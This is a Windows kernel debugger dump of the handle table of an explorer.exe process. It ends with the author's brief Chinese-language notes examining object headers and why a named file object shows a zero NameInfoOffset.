        Directory Object: 00000000  Name: \wkssvc {NamedPipe}

022c: Object: ffb1a0f8  GrantedAccess: 001f0001
Object: ffb1a0f8  Type: (80f0d040) Mutant
    ObjectHeader: ffb1a0e0
        HandleCount: 1  PointerCount: 2
        Directory Object: e14ce6c8  Name: ZonesCacheCounterMutex

0230: Object: ffb130d0  GrantedAccess: 001f0003
Object: ffb130d0  Type: (80f0e490) Event
    ObjectHeader: ffb130b8
        HandleCount: 1  PointerCount: 1

0234: Object: e1a475a8  GrantedAccess: 0002001f
Object: e1a475a8  Type: (80f0a350) Key
    ObjectHeader: e1a47590
        HandleCount: 1  PointerCount: 1
        Directory Object: 00000000  Name: \REGISTRY\USER\S-1-5-21-1390067357-776561741-

839522115-1003\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\MENUORDER\START MENU

0238: Object: ffb167e0  GrantedAccess: 00100001
Object: ffb167e0  Type: (80f42e70) File
    ObjectHeader: ffb167c8
        HandleCount: 1  PointerCount: 3
        Directory Object: 00000000  Name: \Documents and Settings\uty\「开始」菜单

{HarddiskVolume1}

023c: Object: ffb16748  GrantedAccess: 00100001
Object: ffb16748  Type: (80f42e70) File
    ObjectHeader: ffb16730
        HandleCount: 1  PointerCount: 3
        Directory Object: 00000000  Name: \Documents and Settings\All Users\「开始」菜单

{HarddiskVolume1}

0240: Object: ffb923c0  GrantedAccess: 00100020
Object: ffb923c0  Type: (80f42e70) File
    ObjectHeader: ffb923a8
        HandleCount: 1  PointerCount: 1
        Directory Object: 00000000  Name: \WINDOWS\WinSxS\x86_Microsoft.Windows.Common-

Controls_6595b64144ccf1df_6.0.10.0_x-ww_f7fb5805 {HarddiskVolume1}

0244: Object: ffb0fc00  GrantedAccess: 001f0003 (Protected)
Object: ffb0fc00  Type: (80f0e490) Event
    ObjectHeader: ffb0fbe8
        HandleCount: 1  PointerCount: 2

0248: Object: ffbdeb88  GrantedAccess: 001f0003
Object: ffbdeb88  Type: (80f0e490) Event
    ObjectHeader: ffbdeb70
        HandleCount: 1  PointerCount: 1

024c: Object: ffb0fca8  GrantedAccess: 001f0003
Object: ffb0fca8  Type: (80f0e490) Event
    ObjectHeader: ffb0fc90
        HandleCount: 1  PointerCount: 1

0250: Object: ffb16420  GrantedAccess: 00100003
Object: ffb16420  Type: (80f0e490) Event
    ObjectHeader: ffb16408
        HandleCount: 1  PointerCount: 1

0254: Object: ffb16da0  GrantedAccess: 001f0003
Object: ffb16da0  Type: (80f0e490) Event
    ObjectHeader: ffb16d88
        HandleCount: 1  PointerCount: 1

0258: Object: 80e1f0f8  GrantedAccess: 0012019f
Object: 80e1f0f8  Type: (80f42e70) File
    ObjectHeader: 80e1f0e0
        HandleCount: 1  PointerCount: 1
        Directory Object: 00000000  Name: \wkssvc {NamedPipe}

025c: Object: ffb12210  GrantedAccess: 001f0001
Object: ffb12210  Type: (80f0d040) Mutant
    ObjectHeader: ffb121f8
        HandleCount: 1  PointerCount: 2
        Directory Object: e14ce6c8  Name: ZonesCounterMutex

0260: Object: ffb11248  GrantedAccess: 00100020
Object: ffb11248  Type: (80f42e70) File
    ObjectHeader: ffb11230
        HandleCount: 1  PointerCount: 1
        Directory Object: 00000000  Name: \WINDOWS\WinSxS\x86_Microsoft.Windows.Common-

Controls_6595b64144ccf1df_6.0.10.0_x-ww_f7fb5805 {HarddiskVolume1}

0264: Object: e15e2aa0  GrantedAccess: 000f0007
Object: e15e2aa0  Type: (80f0a040) Section
    ObjectHeader: e15e2a88
        HandleCount: 1  PointerCount: 2
        Directory Object: e14ce6c8  Name: UrlZonesSM_uty

0268: Object: ffb18f10  GrantedAccess: 001f0001
Object: ffb18f10  Type: (80f0d040) Mutant
    ObjectHeader: ffb18ef8
        HandleCount: 1  PointerCount: 1

026c: Object: e1788830  GrantedAccess: 000f003f
Object: e1788830  Type: (80f0a350) Key
    ObjectHeader: e1788818
        HandleCount: 1  PointerCount: 1
        Directory Object: 00000000  Name: \REGISTRY\USER\S-1-5-21-1390067357-776561741-

839522115-1003\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\USERASSIST\{75048700-EF1F

-11D0-9888-006097DEACF9}\COUNT

0270: Object: e16c29c8  GrantedAccess: 001f0001
Object: e16c29c8  Type: (80f430b0) Port
    ObjectHeader: e16c29b0
        HandleCount: 1  PointerCount: 1

0274: Object: ffb0fab0  GrantedAccess: 001f0001
Object: ffb0fab0  Type: (80f0d040) Mutant
    ObjectHeader: ffb0fa98
        HandleCount: 1  PointerCount: 2
        Directory Object: e14ce6c8  Name: _SHuassist.mtx

0278: Object: ffb2ba08  GrantedAccess: 00100003
Object: ffb2ba08  Type: (80f0dca0) Semaphore
    ObjectHeader: ffb2b9f0
        HandleCount: 2  PointerCount: 3
        Directory Object: e14ce6c8  Name: PowerProfileRegistrySemaphore

027c: Object: ffb10e90  GrantedAccess: 001f0001
Object: ffb10e90  Type: (80f0d040) Mutant
    ObjectHeader: ffb10e78
        HandleCount: 1  PointerCount: 1

0280: Object: e14247e8  GrantedAccess: 000f003f
Object: e14247e8  Type: (80f0a350) Key
    ObjectHeader: e14247d0
        HandleCount: 1  PointerCount: 1
        Directory Object: 00000000  Name: \REGISTRY\USER\S-1-5-21-1390067357-776561741-

839522115-1003\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\USERASSIST\{5E6AB780-7743

-11CF-A12B-00AA004AE837}\COUNT

0284: Object: ffb259c8  GrantedAccess: 001f0003
Object: ffb259c8  Type: (80f0e490) Event
    ObjectHeader: ffb259b0
        HandleCount: 2  PointerCount: 3
        Directory Object: e14ce6c8  Name: ShellReadyEvent

0288: Object: ffb0fc78  GrantedAccess: 001f0003
Object: ffb0fc78  Type: (80f0e490) Event
    ObjectHeader: ffb0fc60
        HandleCount: 1  PointerCount: 1

028c: Object: ffb0f980  GrantedAccess: 001f0003
Object: ffb0f980  Type: (80f0e490) Event
    ObjectHeader: ffb0f968
        HandleCount: 1  PointerCount: 1

0290: Object: ffb567a0  GrantedAccess: 001f0001
Object: ffb567a0  Type: (80f0d040) Mutant
    ObjectHeader: ffb56788
        HandleCount: 1  PointerCount: 1

0294: Object: 80f24190  GrantedAccess: 001f0003
Object: 80f24190  Type: (80f0e490) Event
    ObjectHeader: 80f24178
        HandleCount: 1  PointerCount: 1

0298: Object: ffb0a560  GrantedAccess: 00100020
Object: ffb0a560  Type: (80f42e70) File
    ObjectHeader: ffb0a548
        HandleCount: 1  PointerCount: 1
        Directory Object: 00000000  Name: \WINDOWS\WinSxS\x86_Microsoft.Windows.Common-

Controls_6595b64144ccf1df_6.0.10.0_x-ww_f7fb5805 {HarddiskVolume1}

029c: Object: ffb56238  GrantedAccess: 00100020
Object: ffb56238  Type: (80f42e70) File
    ObjectHeader: ffb56220
        HandleCount: 1  PointerCount: 1
        Directory Object: 00000000  Name: \WINDOWS\WinSxS\x86_Microsoft.Windows.Common-

Controls_6595b64144ccf1df_6.0.10.0_x-ww_f7fb5805 {HarddiskVolume1}

02a0: Object: ffb0f618  GrantedAccess: 001f03ff
Object: ffb0f618  Type: (80f44528) Thread
    ObjectHeader: ffb0f600
        HandleCount: 2  PointerCount: 4

02a4: Object: ffb0af90  GrantedAccess: 001f0003
Object: ffb0af90  Type: (80f0e490) Event
    ObjectHeader: ffb0af78
        HandleCount: 1  PointerCount: 1

02a8: Object: 80e1b4e0  GrantedAccess: 0012019f
Object: 80e1b4e0  Type: (80f42e70) File
    ObjectHeader: 80e1b4c8
        HandleCount: 1  PointerCount: 1
        Directory Object: 00000000  Name: \ntsvcs {NamedPipe}

02ac: Object: ffb0f348  GrantedAccess: 001f0001
Object: ffb0f348  Type: (80f0d040) Mutant
    ObjectHeader: ffb0f330
        HandleCount: 1  PointerCount: 1

02b0: Object: ffbb6070  GrantedAccess: 001f0001
Object: ffbb6070  Type: (80f0d040) Mutant
    ObjectHeader: ffbb6058
        HandleCount: 1  PointerCount: 1

02b4: Object: ffb0f920  GrantedAccess: 001f0003
Object: ffb0f920  Type: (80f0e490) Event
    ObjectHeader: ffb0f908
        HandleCount: 1  PointerCount: 1

02b8: Object: 80f35a08  GrantedAccess: 001f0003
Object: 80f35a08  Type: (80f0e490) Event
    ObjectHeader: 80f359f0
        HandleCount: 1  PointerCount: 2

02bc: Object: ffb70470  GrantedAccess: 00100002 (Inherit)
Object: ffb70470  Type: (80f0e490) Event
    ObjectHeader: ffb70458
        HandleCount: 2  PointerCount: 5
        Directory Object: e14ce6c8  Name: mixercallback

02c0: Object: ffb010c8  GrantedAccess: 001f0001
Object: ffb010c8  Type: (80f0d040) Mutant
    ObjectHeader: ffb010b0
        HandleCount: 1  PointerCount: 1

02c4: Object: 80dda138  GrantedAccess: 001f0003
Object: 80dda138  Type: (80f0e490) Event
    ObjectHeader: 80dda120
        HandleCount: 1  PointerCount: 1

02c8: Object: 80dfd758  GrantedAccess: 001f0001
Object: 80dfd758  Type: (80f0d040) Mutant
    ObjectHeader: 80dfd740
        HandleCount: 1  PointerCount: 1

02cc: Object: ffbb4510  GrantedAccess: 001f0003
Object: ffbb4510  Type: (80f0e490) Event
    ObjectHeader: ffbb44f8
        HandleCount: 1  PointerCount: 2
        Directory Object: e14ce6c8  Name: HPlugEjectEvent

02d0: Object: ffb20ec0  GrantedAccess: 00100003
Object: ffb20ec0  Type: (80f0dca0) Semaphore
    ObjectHeader: ffb20ea8
        HandleCount: 1  PointerCount: 1

02d4: Object: ffb0fcd8  GrantedAccess: 001f0003
Object: ffb0fcd8  Type: (80f0e490) Event
    ObjectHeader: ffb0fcc0
        HandleCount: 1  PointerCount: 1

02d8: Object: ffb164e0  GrantedAccess: 00100003
Object: ffb164e0  Type: (80f0dca0) Semaphore
    ObjectHeader: ffb164c8
        HandleCount: 1  PointerCount: 1

02dc: Object: e17fa3e0  GrantedAccess: 00020019
Object: e17fa3e0  Type: (80f0a350) Key
    ObjectHeader: e17fa3c8
        HandleCount: 1  PointerCount: 1
        Directory Object: 00000000  Name: \REGISTRY\MACHINE\SOFTWARE\MICROSOFT\WINDOWS

NT\CURRENTVERSION\DRIVERS32

02e0: Object: ffb568e8  GrantedAccess: 001f0003
Object: ffb568e8  Type: (80f0e490) Event
    ObjectHeader: ffb568d0
        HandleCount: 1  PointerCount: 1

02e4: Object: 80e24908  GrantedAccess: 0012019f
Object: 80e24908  Type: (80f42e70) File
    ObjectHeader: 80e248f0
        HandleCount: 1  PointerCount: 1
        Directory Object: 00000000  Name: \svcctl {NamedPipe}

02e8: Object: e1605b20  GrantedAccess: 00000004
Object: e1605b20  Type: (80f0a040) Section
    ObjectHeader: e1605b08
        HandleCount: 3  PointerCount: 4
        Directory Object: e14ce6c8  Name: mmGlobalPnpInfo

02ec: Object: ffb12a48  GrantedAccess: 001f0003
Object: ffb12a48  Type: (80f0e490) Event
    ObjectHeader: ffb12a30
        HandleCount: 1  PointerCount: 1

02f0: Object: e17da6b8  GrantedAccess: 001f0001
Object: e17da6b8  Type: (80f430b0) Port
    ObjectHeader: e17da6a0
        HandleCount: 1  PointerCount: 1

02f4: Object: ffb9fca8  GrantedAccess: 001f0003
Object: ffb9fca8  Type: (80f0e490) Event
    ObjectHeader: ffb9fc90
        HandleCount: 1  PointerCount: 1

02f8: Object: ffb16c08  GrantedAccess: 0012019f
Object: ffb16c08  Type: (80f42e70) File
    ObjectHeader: ffb16bf0
        HandleCount: 1  PointerCount: 1
        Directory Object: 00000000  Name: \{9B365890-165F-11D0-A195-0020AFD156E4}

{KSENUM#00000001}

02fc: Object: e13c7948  GrantedAccess: 00000004
Object: e13c7948  Type: (80f0a040) Section
    ObjectHeader: e13c7930
        HandleCount: 3  PointerCount: 4
        Directory Object: e14ce6c8  Name: WDMAUD_Path_Size

0300: Object: 80e306c0  GrantedAccess: 0012019f
Object: 80e306c0  Type: (80f42e70) File
    ObjectHeader: 80e306a8
        HandleCount: 1  PointerCount: 1
        Directory Object: 00000000  Name: \srvsvc {NamedPipe}

0304: Object: ffb922f8  GrantedAccess: 00100003
Object: ffb922f8  Type: (80f0e490) Event
    ObjectHeader: ffb922e0
        HandleCount: 1  PointerCount: 1

0308: Object: e13c7948  GrantedAccess: 00000004
Object: e13c7948  Type: (80f0a040) Section
    ObjectHeader: e13c7930
        HandleCount: 3  PointerCount: 4
        Directory Object: e14ce6c8  Name: WDMAUD_Path_Size

030c: Object: ffb1c020  GrantedAccess: 001f03ff
Object: ffb1c020  Type: (80f44528) Thread
    ObjectHeader: ffb1c008
        HandleCount: 2  PointerCount: 4

0310: Object: ffb857f8  GrantedAccess: 001f0001
Object: ffb857f8  Type: (80f0d040) Mutant
    ObjectHeader: ffb857e0
        HandleCount: 1  PointerCount: 1

0314: Object: ffb9f3e8  GrantedAccess: 001f0003
Object: ffb9f3e8  Type: (80f0e490) Event
    ObjectHeader: ffb9f3d0
        HandleCount: 1  PointerCount: 1

0318: Object: ffb53878  GrantedAccess: 001f0001
Object: ffb53878  Type: (80f0d040) Mutant
    ObjectHeader: ffb53860
        HandleCount: 3  PointerCount: 4
        Directory Object: e14ce6c8  Name: CTF.TimListCache.FMPDefaultS-1-5-21-1390067357-

776561741-839522115-1003MUTEX.DefaultS-1-5-21-1390067357-776561741-839522115-1003

031c: Object: e172ba18  GrantedAccess: 00000006
Object: e172ba18  Type: (80f0a040) Section
    ObjectHeader: e172ba00
        HandleCount: 2  PointerCount: 3
        Directory Object: e14ce6c8  Name: WDMAUD_Callbacks

0320: Object: ffb98640  GrantedAccess: 00100003
Object: ffb98640  Type: (80f0dca0) Semaphore
    ObjectHeader: ffb98628
        HandleCount: 1  PointerCount: 1

0324: Object: e169f040  GrantedAccess: 000f001f
Object: e169f040  Type: (80f0a040) Section
    ObjectHeader: e169f028
        HandleCount: 3  PointerCount: 4
        Directory Object: e14ce6c8  Name: CTF.TimListCache.FMPDefaultS-1-5-21-1390067357-

776561741-839522115-1003SFM.DefaultS-1-5-21-1390067357-776561741-839522115-1003

0328: Object: ffb9ca80  GrantedAccess: 00100003
Object: ffb9ca80  Type: (80f0e490) Event
    ObjectHeader: ffb9ca68
        HandleCount: 1  PointerCount: 1

032c: Object: ffb0fde8  GrantedAccess: 001f0003
Object: ffb0fde8  Type: (80f0e490) Event
    ObjectHeader: ffb0fdd0
        HandleCount: 1  PointerCount: 1

0330: Object: ffba77f0  GrantedAccess: 001f0003 (Protected)
Object: ffba77f0  Type: (80f0e490) Event
    ObjectHeader: ffba77d8
        HandleCount: 1  PointerCount: 2

0334: Object: 80d56f10  GrantedAccess: 00100003
Object: 80d56f10  Type: (80f0e490) Event
    ObjectHeader: 80d56ef8
        HandleCount: 1  PointerCount: 1

0338: Object: ffb59cd0  GrantedAccess: 00100002 (Inherit)
Object: ffb59cd0  Type: (80f0e490) Event
    ObjectHeader: ffb59cb8
        HandleCount: 2  PointerCount: 6
        Directory Object: e14ce6c8  Name: hardwaremixercallback

033c: Object: ffaf8768  GrantedAccess: 001f03ff
Object: ffaf8768  Type: (80f44528) Thread
    ObjectHeader: ffaf8750
        HandleCount: 2  PointerCount: 4

0340: Object: ffb92500  GrantedAccess: 001f0003
Object: ffb92500  Type: (80f0e490) Event
    ObjectHeader: ffb924e8
        HandleCount: 1  PointerCount: 1

0344: Object: ffb9eff0  GrantedAccess: 001f0003 (Protected)
Object: ffb9eff0  Type: (80f0e490) Event
    ObjectHeader: ffb9efd8
        HandleCount: 1  PointerCount: 2

0348: Object: ffb9f2a0  GrantedAccess: 001f0003
Object: ffb9f2a0  Type: (80f0e490) Event
    ObjectHeader: ffb9f288
        HandleCount: 1  PointerCount: 1

034c: Object: ffb201c0  GrantedAccess: 001f0001
Object: ffb201c0  Type: (80f0d040) Mutant
    ObjectHeader: ffb201a8
        HandleCount: 1  PointerCount: 1

0350: Object: ffb56f80  GrantedAccess: 001f0001
Object: ffb56f80  Type: (80f0d040) Mutant
    ObjectHeader: ffb56f68
        HandleCount: 2  PointerCount: 3
        Directory Object: e14ce6c8  Name: MidiMapper_Configure

0354: Object: ffb56a68  GrantedAccess: 001f0001
Object: ffb56a68  Type: (80f0d040) Mutant
    ObjectHeader: ffb56a50
        HandleCount: 2  PointerCount: 3
        Directory Object: e14ce6c8  Name: MidiMapper_modLongMessage_RefCnt

0358: Object: ffb0f1e0  GrantedAccess: 001f0003
Object: ffb0f1e0  Type: (80f0e490) Event
    ObjectHeader: ffb0f1c8
        HandleCount: 2  PointerCount: 2

035c: Object: ffbaa1a8  GrantedAccess: 001f0003 (Protected)
Object: ffbaa1a8  Type: (80f0e490) Event
    ObjectHeader: ffbaa190
        HandleCount: 1  PointerCount: 2

0360: Object: ffaf84f0  GrantedAccess: 001f03ff
Object: ffaf84f0  Type: (80f44528) Thread
    ObjectHeader: ffaf84d8
        HandleCount: 2  PointerCount: 4

0364: Object: ffb969d0  GrantedAccess: 001f0003
Object: ffb969d0  Type: (80f0e490) Event
    ObjectHeader: ffb969b8
        HandleCount: 1  PointerCount: 1

0368: Object: ffaf7028  GrantedAccess: 0012019f
Object: ffaf7028  Type: (80f42e70) File
    ObjectHeader: ffaf7010
        HandleCount: 1  PointerCount: 1

036c: Object: ffba6430  GrantedAccess: 001f0003
Object: ffba6430  Type: (80f0e490) Event
    ObjectHeader: ffba6418
        HandleCount: 1  PointerCount: 1

0370: Object: ffb9f530  GrantedAccess: 001f0003
Object: ffb9f530  Type: (80f0e490) Event
    ObjectHeader: ffb9f518
        HandleCount: 1  PointerCount: 1

0374: Object: ffb265d0  GrantedAccess: 00100004
Object: ffb265d0  Type: (80f3ee70) WmiGuid
    ObjectHeader: ffb265b8
        HandleCount: 1  PointerCount: 2

0378: Object: ffafb750  GrantedAccess: 001200a0
Object: ffafb750  Type: (80f42e70) File
    ObjectHeader: ffafb738
        HandleCount: 1  PointerCount: 1

037c: Object: ffb16950  GrantedAccess: 00100001
Object: ffb16950  Type: (80f42e70) File
    ObjectHeader: ffb16938
        HandleCount: 1  PointerCount: 3
        Directory Object: 00000000  Name: \Documents and Settings\uty\PrintHood

{HarddiskVolume1}

0380: Object: 80e18308  GrantedAccess: 00100020
Object: 80e18308  Type: (80f42e70) File
    ObjectHeader: 80e182f0
        HandleCount: 1  PointerCount: 1
        Directory Object: 00000000  Name: \WINDOWS\WinSxS\x86_Microsoft.Windows.Common-

Controls_6595b64144ccf1df_6.0.10.0_x-ww_f7fb5805 {HarddiskVolume1}

0384: Object: ffbb2420  GrantedAccess: 00120116
Object: ffbb2420  Type: (80f42e70) File
    ObjectHeader: ffbb2408
        HandleCount: 1  PointerCount: 1

0388: Object: ffaf7630  GrantedAccess: 001200a0
Object: ffaf7630  Type: (80f42e70) File
    ObjectHeader: ffaf7618
        HandleCount: 1  PointerCount: 1

038c: Object: ffaf7960  GrantedAccess: 00100003
Object: ffaf7960  Type: (80f42e70) File
    ObjectHeader: ffaf7948
        HandleCount: 1  PointerCount: 1

0390: Object: ffaf7a48  GrantedAccess: 001200a0
Object: ffaf7a48  Type: (80f42e70) File
    ObjectHeader: ffaf7a30
        HandleCount: 1  PointerCount: 1

0394: Object: ffafbc20  GrantedAccess: 00100003
Object: ffafbc20  Type: (80f0dca0) Semaphore
    ObjectHeader: ffafbc08
        HandleCount: 1  PointerCount: 1

0398: Object: ffb986b0  GrantedAccess: 00100003
Object: ffb986b0  Type: (80f0dca0) Semaphore
    ObjectHeader: ffb98698
        HandleCount: 1  PointerCount: 1

039c: Object: e1a57020  GrantedAccess: 00020019
Object: e1a57020  Type: (80f0a350) Key
    ObjectHeader: e1a57008
        HandleCount: 1  PointerCount: 1
        Directory Object: 00000000  Name: \REGISTRY\MACHINE\SYSTEM\CONTROLSET001

\SERVICES\TCPIP\LINKAGE

03a0: Object: e17b9168  GrantedAccess: 00020019
Object: e17b9168  Type: (80f0a350) Key
    ObjectHeader: e17b9150
        HandleCount: 1  PointerCount: 1
        Directory Object: 00000000  Name: \REGISTRY\MACHINE\SYSTEM\CONTROLSET001

\SERVICES\TCPIP\PARAMETERS

03a4: Object: e1a1cfb8  GrantedAccess: 00020019
Object: e1a1cfb8  Type: (80f0a350) Key
    ObjectHeader: e1a1cfa0
        HandleCount: 1  PointerCount: 1
        Directory Object: 00000000  Name: \REGISTRY\MACHINE\SYSTEM\CONTROLSET001

\SERVICES\NETBT\PARAMETERS\INTERFACES

03a8: Object: e19bba30  GrantedAccess: 00020019
Object: e19bba30  Type: (80f0a350) Key
    ObjectHeader: e19bba18
        HandleCount: 1  PointerCount: 1
        Directory Object: 00000000  Name: \REGISTRY\MACHINE\SYSTEM\CONTROLSET001

\SERVICES\NETBT\PARAMETERS

03ac: Object: e1837c58  GrantedAccess: 001f0001
Object: e1837c58  Type: (80f430b0) Port
    ObjectHeader: e1837c40
        HandleCount: 1  PointerCount: 1

03b0: Object: ffaf82d8  GrantedAccess: 00100020
Object: ffaf82d8  Type: (80f42e70) File
    ObjectHeader: ffaf82c0
        HandleCount: 1  PointerCount: 1
        Directory Object: 00000000  Name: \WINDOWS\WinSxS\x86_Microsoft.Windows.Common-

Controls_6595b64144ccf1df_6.0.10.0_x-ww_f7fb5805 {HarddiskVolume1}

03b4: Object: ffb97ac8  GrantedAccess: 001f0003
Object: ffb97ac8  Type: (80f0e490) Event
    ObjectHeader: ffb97ab0
        HandleCount: 1  PointerCount: 1

03b8: Object: ffaf4da8  GrantedAccess: 001f03ff
Object: ffaf4da8  Type: (80f44528) Thread
    ObjectHeader: ffaf4d90
        HandleCount: 2  PointerCount: 4

03bc: Object: ffb97b90  GrantedAccess: 001f0003
Object: ffb97b90  Type: (80f0e490) Event
    ObjectHeader: ffb97b78
        HandleCount: 1  PointerCount: 1

03c0: Object: e182d308  GrantedAccess: 001f0001
Object: e182d308  Type: (80f430b0) Port
    ObjectHeader: e182d2f0
        HandleCount: 1  PointerCount: 1

03c4: Object: ffba38d8  GrantedAccess: 001f0003 (Protected)
Object: ffba38d8  Type: (80f0e490) Event
    ObjectHeader: ffba38c0
        HandleCount: 1  PointerCount: 2

03c8: Object: e16bc998  GrantedAccess: 001f0001
Object: e16bc998  Type: (80f430b0) Port
    ObjectHeader: e16bc980
        HandleCount: 1  PointerCount: 1

03cc: Object: ffaecb80  GrantedAccess: 001f0003
Object: ffaecb80  Type: (80f0e490) Event
    ObjectHeader: ffaecb68
        HandleCount: 1  PointerCount: 1

03d0: Object: e1aad4b0  GrantedAccess: 001f0001
Object: e1aad4b0  Type: (80f430b0) Port
    ObjectHeader: e1aad498
        HandleCount: 1  PointerCount: 1

03d4: Object: e176c370  GrantedAccess: 0000000c
Object: e176c370  Type: (80f44900) Token
    ObjectHeader: e176c358
        HandleCount: 1  PointerCount: 1

03d8: Object: ffaecb10  GrantedAccess: 001f0003
Object: ffaecb10  Type: (80f0e490) Event
    ObjectHeader: ffaecaf8
        HandleCount: 1  PointerCount: 1

03dc: Object: ffb98678  GrantedAccess: 001f0003
Object: ffb98678  Type: (80f0dca0) Semaphore
    ObjectHeader: ffb98660
        HandleCount: 1  PointerCount: 1

03e0: Object: ffaf7340  GrantedAccess: 001f0001
Object: ffaf7340  Type: (80f0d040) Mutant
    ObjectHeader: ffaf7328
        HandleCount: 3  PointerCount: 4
        Directory Object: e14ce6c8  Name: MSCTF.Shared.MUTEX.EBC

03e4: Object: e1803510  GrantedAccess: 00020019
Object: e1803510  Type: (80f0a350) Key
    ObjectHeader: e18034f8
        HandleCount: 1  PointerCount: 1
        Directory Object: 00000000  Name: \REGISTRY\MACHINE\SYSTEM\CONTROLSET001

\CONTROL\NETWORKPROVIDER\HWORDER

03e8: Object: e17fee08  GrantedAccess: 000f001f
Object: e17fee08  Type: (80f0a040) Section
    ObjectHeader: e17fedf0
        HandleCount: 3  PointerCount: 4
        Directory Object: e14ce6c8  Name: MSCTF.Shared.SFM.EBC

03ec: Object: ffbc8028  GrantedAccess: 00100020
Object: ffbc8028  Type: (80f42e70) File
    ObjectHeader: ffbc8010
        HandleCount: 1  PointerCount: 1
        Directory Object: 00000000  Name: \WINDOWS\WinSxS\x86_Microsoft.Windows.Common-

Controls_6595b64144ccf1df_6.0.10.0_x-ww_f7fb5805 {HarddiskVolume1}

03f0: Object: ffaf7340  GrantedAccess: 001f0001
Object: ffaf7340  Type: (80f0d040) Mutant
    ObjectHeader: ffaf7328
        HandleCount: 3  PointerCount: 4
        Directory Object: e14ce6c8  Name: MSCTF.Shared.MUTEX.EBC

03f4: Object: e17fee08  GrantedAccess: 000f001f
Object: e17fee08  Type: (80f0a040) Section
    ObjectHeader: e17fedf0
        HandleCount: 3  PointerCount: 4
        Directory Object: e14ce6c8  Name: MSCTF.Shared.SFM.EBC

03f8: Object: ffb0fd28  GrantedAccess: 001f0003
Object: ffb0fd28  Type: (80f0e490) Event
    ObjectHeader: ffb0fd10
        HandleCount: 1  PointerCount: 1

0400: Object: ffb9b480  GrantedAccess: 00100003
Object: ffb9b480  Type: (80f0dca0) Semaphore
    ObjectHeader: ffb9b468
        HandleCount: 1  PointerCount: 1

0404: Object: 80f35b58  GrantedAccess: 001f0003
Object: 80f35b58  Type: (80f0e490) Event
    ObjectHeader: 80f35b40
        HandleCount: 1  PointerCount: 1

0408: Object: ffb68020  GrantedAccess: 001f03ff
Object: ffb68020  Type: (80f44528) Thread
    ObjectHeader: ffb68008
        HandleCount: 3  PointerCount: 5

040c: Object: 80f35b88  GrantedAccess: 001f0003 (Protected)
Object: 80f35b88  Type: (80f0e490) Event
    ObjectHeader: 80f35b70
        HandleCount: 1  PointerCount: 2

0410: Object: ffb108f8  GrantedAccess: 001f0003
Object: ffb108f8  Type: (80f0e490) Event
    ObjectHeader: ffb108e0
        HandleCount: 1  PointerCount: 1

0414: Object: 80ece750  GrantedAccess: 001f0003
Object: 80ece750  Type: (80f0e490) Event
    ObjectHeader: 80ece738
        HandleCount: 1  PointerCount: 3

0418: Object: 80f35db8  GrantedAccess: 001f0003
Object: 80f35db8  Type: (80f0e490) Event
    ObjectHeader: 80f35da0
        HandleCount: 1  PointerCount: 1

041c: Object: e1800df0  GrantedAccess: 000f003f
Object: e1800df0  Type: (80f0a350) Key
    ObjectHeader: e1800dd8
        HandleCount: 1  PointerCount: 1
        Directory Object: 00000000  Name: \REGISTRY\USER\S-1-5-21-1390067357-776561741-

839522115-1003\PRINTERS\CONNECTIONS

0420: Object: 80ece780  GrantedAccess: 001f0003 (Protected)
Object: 80ece780  Type: (80f0e490) Event
    ObjectHeader: 80ece768
        HandleCount: 1  PointerCount: 2

0424: Object: 80f35d88  GrantedAccess: 001f0003
Object: 80f35d88  Type: (80f0e490) Event
    ObjectHeader: 80f35d70
        HandleCount: 1  PointerCount: 2

0428: Object: ffb68020  GrantedAccess: 001f03ff
Object: ffb68020  Type: (80f44528) Thread
    ObjectHeader: ffb68008
        HandleCount: 3  PointerCount: 5

042c: Object: ffb74da8  GrantedAccess: 001f03ff
Object: ffb74da8  Type: (80f44528) Thread
    ObjectHeader: ffb74d90
        HandleCount: 2  PointerCount: 4

0430: Object: ffb10928  GrantedAccess: 001f0003 (Protected)
Object: ffb10928  Type: (80f0e490) Event
    ObjectHeader: ffb10910
        HandleCount: 1  PointerCount: 2

0434: Object: 80d5e270  GrantedAccess: 001f0003
Object: 80d5e270  Type: (80f0e490) Event
    ObjectHeader: 80d5e258
        HandleCount: 1  PointerCount: 1

0438: Object: e1644f68  GrantedAccess: 001f0001
Object: e1644f68  Type: (80f430b0) Port
    ObjectHeader: e1644f50
        HandleCount: 1  PointerCount: 1

043c: Object: 80d5e2a0  GrantedAccess: 001f0003 (Inherit)
Object: 80d5e2a0  Type: (80f0e490) Event
    ObjectHeader: 80d5e288
        HandleCount: 2  PointerCount: 3


通过看其他进程的HANLDE列表,HANDLE 000c是表示进程的环境目录?因为其他的进程运行后会显示的是可

执行文件所在的目录,而explrorer的不是,
查看000c句柄所对应的object
kd> !handle 000c 3 ffb67708
processor number 0, process ffb67708
PROCESS ffb67708  SessionId: 0  Cid: 06c0    Peb: 7ffdf000  ParentCid: 0684
    DirBase: 097c3000  ObjectTable: e1600ad0  HandleCount: 270.
    Image: explorer.exe

New version of handle table at e168f000 with 270 Entries in use
000c: Object: ffb69078  GrantedAccess: 00100020 (Inherit)
Object: ffb69078  Type: (80f42e70) File
    ObjectHeader: ffb69060
        HandleCount: 1  PointerCount: 1
        Directory Object: 00000000  Name: \Documents and Settings\uty {HarddiskVolume1}

kd> dt _OBJECT_HEADER
   +0×000 PointerCount     : Int4B
   +0×004 HandleCount      : Int4B
   +0×004 NextToFree       : Ptr32 Void
   +0×008 Type             : Ptr32 _OBJECT_TYPE
   +0×00c NameInfoOffset   : UChar
   +0×00d HandleInfoOffset : UChar
   +0×00e QuotaInfoOffset  : UChar
   +0×00f Flags            : UChar
   +0×010 ObjectCreateInfo : Ptr32 _OBJECT_CREATE_INFORMATION
   +0×010 QuotaBlockCharged : Ptr32 Void
   +0×014 SecurityDescriptor : Ptr32 Void
   +0×018 Body             : _QUAD

kd> dd ffb69060
ffb69060  00000001 00000001 80f42e70 40000800
ffb69070  ffb75270 00000000 00700005 80f18a20
ffb69080  80f2b880 e1396aa8 e178a320 00000000

NameInfoOffset的地方居然是0,可显示的明明有NAME啊,奇怪,

找个有名字的看
kd> !handle 03f4 3 ffb67708
processor number 0, process ffb67708
PROCESS ffb67708  SessionId: 0  Cid: 06c0    Peb: 7ffdf000  ParentCid: 0684
    DirBase: 097c3000  ObjectTable: e1600ad0  HandleCount: 270.
    Image: explorer.exe

New version of handle table at e168f000 with 270 Entries in use
03f4: Object: e17fee08  GrantedAccess: 000f001f
Object: e17fee08  Type: (80f0a040) Section
    ObjectHeader: e17fedf0
        HandleCount: 3  PointerCount: 4
